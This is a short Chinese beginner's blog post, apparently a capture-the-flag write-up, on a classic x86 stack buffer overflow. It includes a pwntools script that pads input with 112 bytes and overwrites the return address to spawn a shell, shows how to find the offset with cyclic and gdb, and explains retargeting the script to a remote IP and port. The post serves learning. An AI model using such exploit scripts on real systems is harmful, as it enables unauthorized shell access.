此篇文章只是记录如何操作,具体的原理还有待学习。
栈溢出原理
•栈溢出原理的是基于x86汇编指令,通过改变函数返回地址ret的值,将函数返回到我们想要的函数入口。具体做法就是找到函数的输入或数组,通过输入数据个数超过函数分配的缓冲区大小,进一步输入,造成ret值被输入值替换。
buf指的是输入地址,所以也需要通过计算找到缓冲区的大小。
操作步骤
多的不说,先上脚本。
coding=UTF-8
from pwn import *
sh=process(’./pwn’)
elf=ELF(’./pwn’)
target=0x0804858B
#即/bin/sh所在位置
sh.sendline(‘a’*112+p32(target))
#至此就获得了系统权限
sh.interactive()
#打开交互页面
(开头的coding=UTF-8,是要进行一个代码的转换,具体的自己去百度吧,如果要运行代码,就一定要加上这句话)
我们从脚本上看,主要的目的就是获得sh.sendline(‘a’*112+p32(target))这一句话中的到ret的地址,多的不说,下面我们用
“撑”的方法来求这个地址吧。
第一步,要撑,就要有东西撑。首先,先做一个段字符。(cyclic 的意思就是做一个长200的有序字符串)
而后,在linux环境下,用gdb运行pwn,输入run进行运行。
这就是这个程序要开始吃的,所以把刚刚做好的200字符馒头端上来!
将刚才的200字字符复制粘贴后,会出现上面的对话框。
观察可知溢出的地方是‘0x62616164’。
那么怎么知道到底有多少个数字溢出了呢?
看他报错的意思是(跳转到0x62616164)这步出错了,意思就是没有0x62616164这个位置,那这个位置是从哪来的呢,就是我们200个有序字符其中最先溢出的第部分。那么只要知道这个0x62616164是我们输入的第几个,就可以数出来它前头有几个数字了。根据ASCII码表,又根据‘0x’是16进制的意思,可以查表得出这串数字转换成字母是‘baad’。接下来就要知道cyclic的顺序了,稍微观察一下就可以知道cyclic的规则(4个数4个数有规则),轻易的就可以数出它的位置。
当然还有更简单的方法,前文也说了cyclic是有序字符串,自然有一个子函数可以查,“cyclic -l”代表着查询你所给的4bit字符前有几个字母。
输入【cyclic -l 0x62616164】,得到112,说明‘baad’前有112个字母,那么这112个字母就是填充空栈的所需量了。接下来多的就会溢出。
那么我们就要把我们要他跳转的位置放在112个字母后让他溢出,就可以实现跳转。
所以地址找到了。
接下来用 gedit f1ag生成f1ag文件(文件名来自ida的get f1ag函数)
最后,最后用语句python 3.py pwn(3是文件名,pwn为取得权限的文件)
就ok啦。
关于远程端嘛,改动两个地方就行。
第一个将sh=process(’./pwn’)改为sh=remote(‘138.128.212.238’, 9999)
第二个将python 3.py pwn改为python 3.py 138.128.212.238 9999、
然后就
第一次搞这种高科技,望大家海涵!
3万+
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
